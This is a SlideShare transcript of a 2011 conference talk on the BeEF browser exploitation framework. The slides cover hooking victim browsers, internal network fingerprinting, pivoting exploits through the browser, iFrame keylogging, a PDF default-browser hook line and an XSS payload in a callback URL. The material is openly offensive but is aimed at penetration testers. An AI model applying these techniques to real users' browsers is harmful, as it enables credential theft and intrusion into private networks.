Hacktivity2011 be ef-preso_micheleorru
Upcoming SlideShare
Loading in...5
×
 

Hacktivity2011 be ef-preso_micheleorru

on

  • 2,872 views

 

Statistics

Views

Total Views
2,872
Views on SlideShare
1,543
Embed Views
1,329

Actions

Likes
0
Downloads
29
Comments
0

6 Embeds 1,329

http://antisnatchor.com 1288
http://www.antisnatchor.com 31
http://paper.li 7
http://koto.github.com 1
http://174.136.111.122 1
http://webcache.googleusercontent.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Hacktivity2011 be ef-preso_micheleorru Hacktivity2011 be ef-preso_micheleorru Presentation Transcript

  • Dr. Strangelove or:how I Learned to Stop Worrying and Love the BeEFMichele “antisnatchor” Orru’ 18 September 2011
  • Who am I?❖ Penetration Tester @ The Royal Bank ofScotland❖ BeEF core developer: - Tunneling Proxy, - XssRays integration, - various exploits, - lot of bug-fixing, testing and fun❖ Kubrick fan❖ Definitely not a fan of our Italian primeminister Silvio „bunga-bunga” Berlusconi❖@antisnatchor❖http://antisnatchor.com
  • outline: cutting, devouring and digesting the legs off a browser❖ What the hell is BeEF?❖Cutting - Target enumeration and analysis❖Devouring - Internal net fingerprint - Exploiting internal services through the hooked browser - Keylogging, browser pwnage❖Digesting - Persistence, tunneling sqlmap/Burp through BeEF proxy - XSSrays integration❖Future development and ideas
  • The Browser Nowadays
  • What the hell is BeEF?❖ BeEF: Browser Exploitation Framework❖Pioneered by Wade Alcorn in 2005 (publicrelease)❖Powerful platform for Client-side pwnage,XSS post-exploitation and generally victimbrowser security-context abuse❖Each browser is likely to be within adifferent security context, and each contextmay provide a set of unique attack vectors.❖ The framework allows the penetrationtester to select specific modules (in real-time) to target each browser, and thereforeeach context.
  • What the hell is BeEF?
  • Cutting: Target enum and analysis❖ Lot of juicy information after first hookinitialization : ❖Browser/OS version ❖Cookies ❖Browser plugins ❖Supported features (Google Gears, Web Sockets, Flash, Java, . .)❖Specific modules are also there to help ❖Detect links/visited URLs ❖Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ❖Execute your custom Javascript
  • Cutting: Target enum and analysis
  • Devouring: Internal net fingerprint❖Recon/NetworkFingerprinting module Watch „Jboss 6.0.0M1 JMX Deploy Exploit:❖Knowing the victim internal IP, the attackercan start to fingerprint the internal networkvia Javascript to find common servers anddevices. (http://vimeo.com/24410203) the BeEF way... ” on Vimeo❖The approach currently in use is similar toYokoso (InGuardians) ❖Map of device/application default images ❖img tags are loaded into the victim DOM ❖Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found
  • Devouring: Internal net fingerprint❖Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011)❖ They developed new BeEF modules❖ They are working with us and their work will be available in BeEF trunk soon.A few examples: ❖Internal DNS enumeration ❖Reliable Port Scanning ❖Ping sweep
  • Devouring: exploiting internal services❖Network/JbossJmxUploadExploit module Watch „Jboss 6.0.0M1 JMX Deploy Exploit:❖JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploitis available in MSF, but you need to havedirect access to the target (or use a host as apivot) (http://vimeo.com/24410203) the BeEF way... ” on Vimeo❖Then why not use the victim browser as apivot?
  • Devouring: persistent keylogging❖Persistence/iFrameKeylogger module❖We can inject a 100%width/height overlay iFramethat loads the login page(in-domain), attaching alistener for keyboardevents (keylogger) in JS.❖After the victim logs in,she will stay in the injectediFrame while thecommunication channel willbe persistent in thebackground.
  • Devouring: module autorun❖ We’ve ported back (from the old PHPversion) the autorun feature❖Add autorun: true in the command moduleconfig.yaml that you want to autorun❖When a new browser will be hooked in BeEF,the module will be automatically launched❖Imagine addingautorun: true inMetasploit autopwnmodule (anotherfeature ported back)...
  • Digesting: hook default browser❖Originally disclosed by Billy (xs-sniper)Rios on „Expanding the Attack Surface”❖Browser/HookDefault module❖We use a PDF in order to attempt hookingthe default browser❖When executed, the hooked browser willload a PDF in a new window and use that tostart the default browser. ❖app.launchURL("http://192.168.56.1/page-With-BeEF- Hook-Js.html",true); ❖If everything will be ok, we hooked the default browser. ❖Future improvements: configurable bounce page and ruby pdf library
  • Digesting: tunneling proxy❖Having a communication channel with thehooked browser, we can: ❖Receive requests as a proxy on BeEF ❖Translate these requests to XHRs (in- domain) ❖Parse the XHRs responses and send the data back to the original requestor...
  • Digesting: tunneling proxy❖Using the victim browser hooked in BeEF as atunneling proxy, we will see the followingscenarios: ❖browsing the authenticated surface of the hooked domain through the security context of the victim browser; ❖spidering the hooked domain through the security context of the victim browser; ❖finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
  • Digesting: tunneling proxy Let see the tunneling proxy in action! (demo time)
  • Digesting: XssRays❖ Originally developed by Gareth Heyes in2009 as a pure JS-based XSS scanner❖ The XssRays BeEF extension allows you tocheck if links, forms and URI paths of the pagewhere the browser is hooked are vulnerableto XSS.❖What XssRays do is basically parse all thelinks and forms of the page where it is loadedand check for XSS on GET, POST parameters,and also in the URI path.
  • Digesting: XssRays❖The original code by Gareth, from 2009,used a nice trick (the location.hash fragment)in order to have a sort of callback betweenparent and child iFrames❖This is now patched by all recent browsers. So how to check for XSSs cross- domain, respecting the SOP restrictions?
  • Digesting: XssRays❖We inject a vector that will contact backBeEF if the JS code will be successfullyexecuted (thus, the XSS confirmed).❖No false positives (oh yes, that’s what Ilike)!❖Basically the document.location.href of theinjected iFrame that contains the vector willpoint to a know BeEF resource. The followingis an example value of href:✴http://192.168.84.1:3000/ui/xssrays/rays?hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection%20double&method=GET
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Digesting: XssRays
  • Future dev and ideas❖Improve XssRays: ❖add more attack vectors, more testing ❖add JS depth crawler❖Multi-hooking: a browser can be hooked onmultiple domains❖Check for time-based blind SQLi cross-domain via JS❖Improve the BeEF console (command line UI)❖Well...take a look here: http://code.google.com/p/beef/issues/list
  • Get in touch with us❖Follow the BeEF: @beefproject❖Checkout BeEF: http://code.google.com/p/beef/❖Check our website: http://beefproject.com❖Have fun with it❖We’re hiring!!! (but we’ll not payyou...seriously, we have so many tasks to do,join us)
  • Thanks to❖Wade Alcorn and the other BeEF ninjas:Ben, Scotty, Christian, Brendan, Saafan,. .❖My colleagues Piotr & Michal❖My employer❖Hacktivity crew and you attendees
  • Questions?Thanks for your time!